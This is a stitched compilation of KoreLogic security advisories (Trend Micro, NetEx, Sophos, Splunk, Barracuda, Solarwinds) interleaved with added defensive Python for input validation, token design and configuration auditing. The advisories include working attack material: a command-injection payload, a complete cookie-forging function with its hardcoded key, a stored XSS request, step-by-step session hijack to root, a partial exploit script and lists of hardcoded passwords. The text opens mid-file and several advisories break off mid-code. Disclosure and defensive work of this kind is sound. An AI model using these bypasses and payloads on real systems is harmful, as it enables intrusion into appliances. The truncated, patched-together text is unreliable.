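from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# The only shape the parameter may have: a one- or two-digit level.
MSGLVL_RE = re.compile(r"^[0-9]{1,2}$")
# Shell constructs that have no business in a numeric form field.
SHELL_META_RE = re.compile(r"\$\(|`|;|\||\$\{")


def validate_msglvl(value: str) -> Optional[int]:
    """Return the level as an int, or None if it is not a plain number."""
    if not MSGLVL_RE.match(value):
        return None
    return int(value)


def handle_request(msglvl_val: str) -> Dict[str, str]:
    """What the web handler should do: validate, then run a fixed argv list
    with no shell, so the parameter can only ever be a single argument."""
    level = validate_msglvl(msglvl_val)
    if level is None:
        return {"status": "rejected", "reason": "msglvl_val is not a 1-2 digit number"}
    # Stand-in for the appliance's real tool (assumption for illustration).
    argv = [sys.executable, "-c",
            "import sys; print('level set to', sys.argv[1])", str(level)]
    out = subprocess.run(argv, capture_output=True, text=True, check=True)
    return {"status": "ok", "output": out.stdout.strip()}


def flag_injection_attempts(post_bodies: List[str]) -> List[str]:
    """Detection side: return bodies that carry shell syntax after URL decoding.
    Runs equally well over a web access log that records POST bodies."""
    hits = []
    for body in post_bodies:
        if SHELL_META_RE.search(unquote_plus(body)):
            hits.append(body)
    return hits


# Constructed request bodies: benign, the advisory's payload, and an
# URL-encoded variant of the same idea.
SAMPLE_BODIES = [
    "set_id=msglvl_val=5=on=Set",
    "set_id=msglvl_val=$(cp /etc/profile.d/which-2.sh /var/ftp/pub/updates/a.run)=on=Set",
    "set_id=msglvl_val=%24%28id%29=on=Set",
]


if __name__ == "__main__":
    print(handle_request("5"))
    print(handle_request("$(id)"))
    for body in flag_injection_attempts(SAMPLE_BODIES):
        print("suspicious body:", body)
```

The validator is deliberately an allowlist on shape rather than a denylist of metacharacters: the detection regex is useful for finding attempts in logs, but as an input filter it would always be one character short.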
KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass
Title: Trend Micro IMSVA Management Portal Authentication Bypass
Advisory ID: KL-001-2018-006
Publication Date: 2018.02.08
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt

1. Vulnerability Details

   Affected Vendor: Trend Micro
   Affected Product: InterScan Mail Security Virtual Appliance
   Affected Version: 9.1.0.1600
   Platform: Embedded Linux
   CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root
   Impact: Authentication Bypass
   Attack vector: HTTPS

2. Vulnerability Description

   Any unauthenticated user can bypass the authentication process.

3. Technical Description

   The web application is plugin-based and allows widgets to be loaded into the application. A plugin which is loaded by default stores a log file of events in a directory which can be accessed by unauthenticated users. Files within this directory (such as /widget/repository/log/diagnostic.log) which contain cookie values can then be read, parsed, and session information extracted. A functional exploit is shown below.

4. Mitigation and Remediation Recommendation

   Trend Micro has released a Critical Patch update to the affected versions for this vulnerability. The advisory and links to the patch(es) are available from the following URL:
   https://success.trendmicro.com/solution/1119277

5. Credit

   This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

   2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.
   2017.08.11 - Trend Micro confirms receipt.
   2017.09.15 - KoreLogic asks for an update on the triage of the reported issue.
   2017.09.15 - Trend Micro informs KoreLogic that the issue is in remediation but there is no expected release date yet.
   2017.09.25 - 30 business days have elapsed since the vulnerability was reported to Trend Micro.
   2017.10.06 - Trend Micro informs KoreLogic that the issue will not be addressed before the 45 business-day deadline. They ask for additional time for the details to remain embargoed in order to complete QA on the proposed fix.
   2017.10.06 - KoreLogic agrees to extend the disclosure timeline.
   2017.10.17 - 45 business days have elapsed since the vulnerability was reported to Trend Micro.
   2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch for IMSVA 9.1 (Critical Patch 1682) has gone live, but they are still working on the patch for IMSVA 9.0.
   2017.11.07 - 60 business days have elapsed since the vulnerability was reported to Trend Micro.
   2017.12.21 - 90 business days have elapsed since the vulnerability was reported to Trend Micro.
   2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0 Critical Patch is being localized for foreign language customers. Expected release date is late January 2018.
   2018.01.18 - Trend Micro notifies KoreLogic that the expected release date for the IMSVA 9.0 Critical Patch and the advisory is to be January 31, 2018.
   2018.01.23 - 110 business days have elapsed since the vulnerability was reported to Trend Micro.
   2018.01.31 - Trend Micro releases the advisory associated with this vulnerability and the related Critical Patches.
   2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

   #!/usr/bin/python3
   from argparse import ArgumentParser
   from ssl import _create_unverified_context
   from time import mktime
   from urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener

   banner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass
   {}'''.format('-'*67)

   class Exploit:
       def __init__(self, args):
           self.target_host = args.host
           self.target_port = args.port
           self.list_all = args.ls
           self.sessions = []
           self.session_latest_time = None
           self.session_latest_id = None
           self.sessions_active = []
           return None
       def is_target(self):
           url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port))
           url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port))
           if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200:
               try:
                   urlopen(url_loginjsp, context=_create_unverified_context())
               except HTTPError as e:
                   if e.code == 403:
                       return True
                   else:
KL-001-2018-002 : NetEx HyperIP Authentication Bypass
Title: NetEx HyperIP Authentication Bypass
Advisory ID: KL-001-2018-002
Publication Date: 2018.02.08
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-002.txt

1. Vulnerability Details

Affected Vendor: NetEx
Affected Product: HyperIP
Affected Version: 6.1.0
Platform: Embedded Linux
CWE Classification: CWE-592: Authentication Bypass Issues
Impact: Authentication Bypass
Attack vector: HTTPS

2. Vulnerability Description

Authentication for the management application can be bypassed by recreating the algorithm used to create predictable valid cookies.

3. Technical Description

Authentication can be bypassed using the function below.

>>> from hashlib import md5
>>> from hmac import new
>>> def bypass_auth(user,srcip):
...     key = new('$#^Sub/s$',user+srcip,md5).hexdigest()
...     token = new(key,user+srcip,md5).hexdigest()
...     return token
...

The attacker first creates a cookie token.

>>> print bypass_auth('hipadmin','[redacted]')
b6b73844ce4df64f459948c5475a1096

Then the attacker can submit requests containing that value as the auth-token cookie, which will be trusted by the application.

4. Mitigation and Remediation Recommendation

The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2017.07.24 - KoreLogic submits vulnerability details to NetEx.
2017.07.24 - NetEx confirms receipt.
2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined.
2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx.
2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018.
2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx.
2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx.
2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx.
2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live.
2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

signature.asc Description: OpenPGP digital signature
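The HyperIP token above is derivable by anyone because its only inputs are a string constant in the code plus the user name and source IP, both of which the client chooses. The following is an added example, not NetEx's code and not part of the KoreLogic advisory, of the property a cookie token needs instead: a MAC keyed with a per-deployment random secret that never leaves the server, an issue time so tokens expire, and a constant-time comparison. The secrets, user name, addresses and timestamps in the demo are constructed values.

```python
"""Session tokens that cannot be recomputed from public inputs.

Added example (not NetEx's or KoreLogic's code).  The secret is generated
once per deployment and stored server-side; it is never derived from the
user name, the client address or a constant in the source.
"""
import hashlib
import hmac
import secrets


class SessionTokens:
    def __init__(self, secret=None, ttl_seconds=3600):
        # 32 random bytes per deployment; the demo passes fixed bytes so it is
        # reproducible, a real service would keep the default.
        self.secret = secret if secret is not None else secrets.token_bytes(32)
        self.ttl = ttl_seconds

    def _mac(self, user, srcip, issued_at):
        # Bind the token to user, source address and issue time.
        msg = f"{user}|{srcip}|{issued_at}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def issue(self, user, srcip, now):
        """Return 'issued_at.mac'; `now` is integer UNIX time supplied by the caller."""
        return f"{now}.{self._mac(user, srcip, now)}"

    def verify(self, token, user, srcip, now):
        """True only for a token minted with this secret for this user and
        source IP that is neither expired nor dated in the future."""
        issued_at_str, sep, mac = token.partition(".")
        if sep != "." or not issued_at_str.isdigit():
            return False
        issued_at = int(issued_at_str)
        if issued_at > now or now - issued_at > self.ttl:
            return False
        expected = self._mac(user, srcip, issued_at)
        # Constant-time comparison; encode so a non-ASCII token cannot raise.
        return hmac.compare_digest(expected.encode(), mac.encode())


def demo():
    """Constructed scenario: two deployments with different secrets."""
    server_a = SessionTokens(secret=b"\x01" * 32)
    server_b = SessionTokens(secret=b"\x02" * 32)
    t0 = 1_600_000_000
    tok = server_a.issue("hipadmin", "192.0.2.10", t0)
    return {
        "valid": server_a.verify(tok, "hipadmin", "192.0.2.10", t0 + 60),
        "other_ip": server_a.verify(tok, "hipadmin", "192.0.2.11", t0 + 60),
        "other_deployment": server_b.verify(tok, "hipadmin", "192.0.2.10", t0 + 60),
        "expired": server_a.verify(tok, "hipadmin", "192.0.2.10", t0 + 3601),
        "malformed": server_a.verify("nodot", "hipadmin", "192.0.2.10", t0),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:17s} accepted={ok}")
```

The contrast with the advisory is the `other_deployment` case: a token built for one HyperIP appliance is valid on every appliance running the same code, whereas here a second installation with its own secret rejects it outright.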
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Gateway
Affected Version: 4.4.1
Platform: Embedded Linux
CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation, CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page
Impact: Arbitrary Code Execution
Attack vector: HTTP

2. Vulnerability Description

The report scheduler menu within the management portal contains a persistent cross site scripting vulnerability. This vulnerability can be used to target other users of the same portal.

3. Technical Description

A valid session is required to create the report with the persistent cross site scripting payload attached. An example attack payload has been included below. This payload is designed to trigger an alert box with the number one being displayed.

POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 1190
DNT: 1
Connection: close

action=save=016a16896568739c11955632068abddd=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d

HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:05:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41

{"status":0,"statusMsg":"Settings saved"}

The URL-encoded value passed in the input parameter decodes to an array containing a single JSON buffer.

[{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1", "sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday", "txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd", "schedule_id": "dGVzdA==", "owner": "admin"}]

Within the JSON buffer is a key called txt_schedule_name. The value for this key is the name of the scheduled report. This value is included in the report schedule list.

"txt_schedule_name": "test<script>alert(1);</script>"

The HTML tags are then stored. When the report schedule is viewed, the resulting JSON is sent as content-type text/html instead of application/json, causing the browser to execute any unescaped javascript it contains. The output is HTML-encoded with the exception of the txt_schedule_name: value, which is not sanitized, and the payload triggers.

POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 81
DNT: 1
Connection: close

action=load=name=asc=016a16896568739c11955632068abddd

HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:06:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private,
KL-001-2017-022 : Splunk Local Privilege Escalation
Title: Splunk Local Privilege Escalation
Advisory ID: KL-001-2017-022
Publication Date: 2017.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-022.txt

1. Vulnerability Details

Affected Vendor: Splunk
Affected Product: Splunk Enterprise
Affected Version: 6.6.x
Platform: Embedded Linux
CWE Classification: CWE-280: Improper Handling of Insufficient Permissions or Privileges
Impact: Privilege Escalation
Attack vector: Local

2. Vulnerability Description

Splunk can be configured to run as a non-root user. However, that user owns the configuration file that specifies the user to run as, so it can trivially gain root privileges.

3. Technical Description

Splunk runs multiple daemons and network listeners as root by default. It can be configured to drop privileges to a specified non-root user at startup such as user splunk, via the SPLUNK_OS_USER variable in the splunk-launch.conf file in $SPLUNK_HOME/etc/ (such as /opt/splunk/etc/splunk-launch.conf). However, the instructions for enabling such a setup call for chown'ing the entire $SPLUNK_HOME directory to that same non-root user. For instance:

http://docs.splunk.com/Documentation/Splunk/6.6.2/Installation/RunSplunkasadifferentornon-rootuser

"4. Run the chown command to change the ownership of the splunk directory and everything under it to the user that you want to run the software.

chown -R splunk:splunk $SPLUNK_HOME"

Therefore, if an attacker gains control of the splunk account, they can modify $SPLUNK_HOME/etc/splunk-launch.conf to remove/unset SPLUNK_OS_USER so that the software will retain root privileges, and place backdoors under $SPLUNK_HOME/bin/, etc. that will take malicious actions as user root the next time Splunk is restarted.

4. Mitigation and Remediation Recommendation

The vendor has published a mitigation for this vulnerability at:

https://www.splunk.com/view/SP-CAAAP3M

5. Credit

This vulnerability was discovered by Hank Leininger of KoreLogic, Inc.

6. Disclosure Timeline

2017.08.17 - KoreLogic submits vulnerability details to Splunk.
2017.08.17 - Splunk confirms receipt.
2017.08.22 - Splunk notifies KoreLogic that the issue has been assigned an internal ticket and will be addressed.
2017.09.29 - 30 business days have elapsed since the vulnerability was reported to Splunk.
2017.10.17 - KoreLogic requests an update from Splunk.
2017.10.18 - Splunk informs KoreLogic that they will issue an advisory on October 28th.
2017.10.23 - 45 business days have elapsed since the vulnerability was reported to Splunk.
2017.10.30 - Splunk notifies KoreLogic that the advisory is published.
2017.11.03 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
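The weakness in the Splunk advisory is a relationship between three things rather than a single setting: the drop-to account named in splunk-launch.conf, the owner of that file, and the owner of the binaries root executes before dropping. The audit below is an added example, not KoreLogic's or Splunk's code, that takes those three facts as input and reports the combinations the advisory describes. The file contents, paths and owners are constructed for the demo; on a real host they would come from reading the file and stat'ing it.

```python
"""Audit of a Splunk-style privilege-drop configuration.

Added example (not KoreLogic's or Splunk's code).  Inputs are the text of
splunk-launch.conf, its owner, and the owner of $SPLUNK_HOME/bin; all of
the sample values below are constructed.
"""
from dataclasses import dataclass


@dataclass
class ConfFile:
    path: str
    owner: str   # owning user as stat would report it
    text: str    # file contents


def parse_launch_conf(text):
    """Parse KEY=VALUE lines; blank lines and '#' comments are ignored, so a
    commented-out SPLUNK_OS_USER counts as unset, the dangerous case."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def audit_privilege_drop(conf, bin_dir_owner):
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    os_user = parse_launch_conf(conf.text).get("SPLUNK_OS_USER", "")
    if not os_user or os_user == "root":
        findings.append("SPLUNK_OS_USER is unset or root: daemons keep root privileges")
        return findings
    # The advisory's case: the drop-to account owns the file naming the drop-to account.
    if conf.owner == os_user:
        findings.append(
            f"{conf.path} is owned by {os_user}; that account can remove "
            "SPLUNK_OS_USER and the daemons will run as root after restart")
    # The same ownership on bin/ lets the account replace what root executes at start.
    if bin_dir_owner == os_user:
        findings.append(
            f"$SPLUNK_HOME/bin is owned by {os_user}; binaries started as root "
            "are writable by the service account")
    return findings


# Constructed sample: the layout produced by chown -R splunk:splunk $SPLUNK_HOME.
WEAK = ConfFile(
    "/opt/splunk/etc/splunk-launch.conf", "splunk",
    "# Splunk launch settings\nSPLUNK_HOME=/opt/splunk\nSPLUNK_OS_USER=splunk\n")
# Constructed sample: same settings, launch config and bin/ kept root-owned.
HARDENED = ConfFile("/opt/splunk/etc/splunk-launch.conf", "root", WEAK.text)

if __name__ == "__main__":
    for label, conf, bin_owner in (("weak", WEAK, "splunk"), ("hardened", HARDENED, "root")):
        print(label, audit_privilege_drop(conf, bin_owner) or ["ok"])
```

The HARDENED sample only shows what the audit accepts; which files Splunk's own processes must be able to write is the vendor's call, and the mitigation link in section 4 is the place to check that.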
KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions
Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions
Advisory ID: KL-001-2017-020
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: UTM 9
Affected Version: 9.410
Platform: Embedded Linux
CWE Classification: CWE-280: Improper Handling of Insufficient Permissions or Privileges
Impact: Root Access
Attack vector: SSH

2. Vulnerability Description

The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, it is possible to list a directory containing sub-directories whose names are valid session identifiers (SID) and can be used to make requests on behalf of other accounts, such as admin. This allows for escalation to root privilege.

3. Technical Description

1. Obtain a privileged session token

$ ssh loginuser@1.3.3.7
loginuser@1.3.3.7's password:

Sophos UTM
(C) Copyright 2000-2016 Sophos Limited and others. All rights reserved.
Sophos is a registered trademark of Sophos Limited and Sophos Group.
All other product and company names mentioned are trademarks or registered
trademarks of their respective owners.

For more copyright information look at /doc/astaro-license.txt
or http://www.astaro.com/doc/astaro-license.txt

NOTE: If not explicitly approved by Sophos support, any modifications
      done by root will void your support.

loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/
loginuser@[redacted]:/var/confd/var/sessions > ls -la
total 40
drwxr-xr-x 2 root root 4096 Mar 23 14:53 .
drwxr-xr-x 5 root root 4096 Mar 19 16:06 ..
-rw-r--r-- 1 root root  359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC
-rw-r--r-- 1 root root    5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock
-rw-r--r-- 1 root root  369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk
-rw-r--r-- 1 root root   35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock
-rw-r--r-- 1 root root  367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP
-rw-r--r-- 1 root root   10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock
-rw-r--r-- 1 root root  370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN
-rw-r--r-- 1 root root    5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock

2. Set the root password

POST /webadmin.plx HTTP/1.1
Host: 1.3.3.7:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Referer: https://1.3.3.7:/
Content-Length: 418
Cookie: SID=xZzeOIhVClqKYsmCKHrN
DNT: 1
Connection: close

{"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 14:57:19 GMT
Server: Apache
Expires: Thursday, 01-Jan-1970 00:00:01 GMT
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Option: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 24690

{"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba", [snip] "_cookie":null,"wdebug":0}

3. Look for success message.

"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

4. Profit.

loginuser@[redacted]:/home/login > su
Password:
[redacted]:/home/login # id
uid=0(root) gid=0(root) groups=0(root),890(xorp)

4.
KL-001-2017-014 : Barracuda WAF Support Tunnel Hijack
Title: Barracuda WAF Support Tunnel Hijack
Advisory ID: KL-001-2017-014
Publication Date: 2017.07.06
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-014.txt

1. Vulnerability Details

Affected Vendor: Barracuda
Affected Product: Web Application Firewall V360
Affected Version: Firmware v8.0.1.014
Platform: Embedded Linux
CWE Classification: CWE-304: Missing Critical Step In Authentication
Impact: Remote Access
Attack vector: DNS, SSH

2. Vulnerability Description

During the creation of a tunnel connection to Barracuda support, the code creating the tunnels fails to: 1) validate DNS records, 2) validate the SSH host key, and 3) transmit the public SSH key over an encrypted, verified channel.

3. Technical Description

file: /usr/local/bin/support-tunnel

The first host added to the list of available remote hosts is obtained through DNS resolution of support01.barracudanetworks.com. If an attacker can control DNS, it is possible to subvert network traffic by creating records that will resolve to an attacker's IP address.

[snip]
sub remote_hosts() {
    my $central = 'support01.barracudanetworks.com';
    my @hosts;
    my $host = resolv_host($central) || $central;
    push @hosts, {
        'ssh' => { 'host' => $host, 'port' => 22 },
        'web' => { 'host' => $host, 'port' => 80 },
    };
    push @hosts, {
        'ssh' => { 'host' => '64.235.147.77', 'port' => 22 },
        'web' => { 'host' => '64.235.147.77', 'port' => 80 },
    };
    push @hosts, {
        'ssh' => { 'host' => '64.235.154.112', 'port' => 22 },
        'web' => { 'host' => '64.235.154.112', 'port' => 80 },
    };
    return @hosts;
} # remote_hosts
[snip]

The appliance will send a URL-encoded copy of the public key using HTTP.

sub tunnel_post_key() {
    my $host   = shift;
    my $port   = shift;
    my $serial = shift;
    my $pubkey = shift;
    [snip]
    $url = sprintf('/tunnel-broker?serial=%s=%s=%s=%s=%s',
                   $serial, Digest::MD5::md5_hex($serial),
                   url_escape($pubkey), Digest::MD5::md5_hex($pubkey),
                   url_escape(VERSION));
    #
    # Write an HTTP request.
    #
    $req = "GET $url HTTP/1.0\r\nHost: $host\r\n\r\n";
    do {
        $retval = aio_write($sock, $req);
    } while ($retval == AIO_WOULDBLOCK && $stop > time);
    if ($retval != AIO_SUCCESS) {
        throw(SYSTEM_EXCEPTION, "aio_write($addr:$port, $req): $!");
        aio_close($sock);
        return undef;
    }
    [snip]
    return 1;
} # tunnel_post_key

It should be noted that the appliance is shipped with a default key (pvt_md5:194d9a5167153e1137134e1896d67b47, pub_md5:62c3a6e160cc501f2ffa2d1434176e93) but will generate and submit a new key should the default key no longer exist. This happens in the ssh_key_path function.

Finally, the appliance specifically sets StrictHostKeyChecking to no. This instructs the ssh client to ignore any SSH host-key mismatch and allows an attacker to more easily leverage their own SSH server for attacks.

sub ssh_command_args($\;$$) {
    my $sshcmd    = shift;
    my $serialref = shift;
    my $sshkey    = shift;
    my $sshhost   = shift || 'support01.barracudanetworks.com';
    my $sshport   = shift || 22;
    my $lsshport  = shift || local_ssh_port || 22;
    my $lwebport  = shift || local_web_port || 8000;
    my $lsslvpnport = shift;
    if( get_product() eq "bvs" ) {
        $lsslvpnport = local_sslvpn_port || 443 if !$lsslvpnport;
    }
    my @version = ssh_version_of($sshcmd);
    my (@args, $has_unixfwd, $has_exitonfwdfailure, $has_defineremotehost);
    $has_unixfwd          = ($version[0] > 4 || ($version[0] == 4 && $version[1] >= 4));
    $has_exitonfwdfailure = ($version[0] > 4 || ($version[0] == 4 && $version[1] >= 4));
    $has_defineremotehost = ($version[0] >= 4);
    push @args, '-T';                                   # Don't allocate a TTY
    push @args, '-' . ('v' x want_verbose)              # Passthru verbosity
        if want_verbose;
    push @args, '-o', 'StrictHostKeyChecking=no';       # Ignore Support01 host key (bad idea?)
    push @args, '-i', $sshkey;
    push @args, '-o',
KL-001-2017-015 : Solarwinds LEM Hardcoded Credentials
Title: Solarwinds LEM Hardcoded Credentials
Advisory ID: KL-001-2017-015
Publication Date: 2017.07.06
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-015.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials
Impact: Unintended Access
Attack vector: Local

2. Vulnerability Description

The appliance contains multiple hardcoded passwords and hash digests.

3. Technical Description

# grep "password" /usr/local/jetty/scripts/certs/openssl.cnf
output_password= QDXTCDD2nJIU
# grep "password" /usr/local/jetty/scripts/certs/openssl.cnf.org
output_password= QDXTCDD2nJIU
# grep "password" /usr/local/contego/scripts/certs/openssl.cnf
output_password= QDXTCDD2nJIU
# grep -i "password" /usr/local/jetty/etc/jetty-ssl.xml
q4ROVdYYsV5M
q4ROVdYYsV5M
q4ROVdYYsV5M
# grep -i "password" /usr/local/contego/scripts/indepth-backup.pl
my $PASSWORD = "omgcontegorox";
# grep -i "password" /usr/local/contego/scripts/database/pgsql/flow.sql
CREATE ROLE trigeo WITH CREATEDB LOGIN PASSWORD 'rootme';
CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports';
//Empty Password
# grep -i "password" /usr/local/contego/run/manager/toolconfig/toolstore.script
CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e'
# grep -i "password" /usr/local/contego/run/indepth.conf
InDepthMaintenPassword=tVyf+rPBho7S0WOd/29MPg\=\=
InDepthManagerPassword=zhZi52gTxKbMKTzgdfBtMQ\=\=
// cracks to "welcome" without quotes
# grep -i "password" /usr/local/contego/run/tomcat/conf/tomcat-users.xml
# grep -i "password" /usr/local/contego/run/system.conf
archive.password=omgcontegorox
backup.password=omgcontegorox
logbackup.password=omgcontegorox
# grep -i "password" /usr/local/contego/run/daemon-args.pl
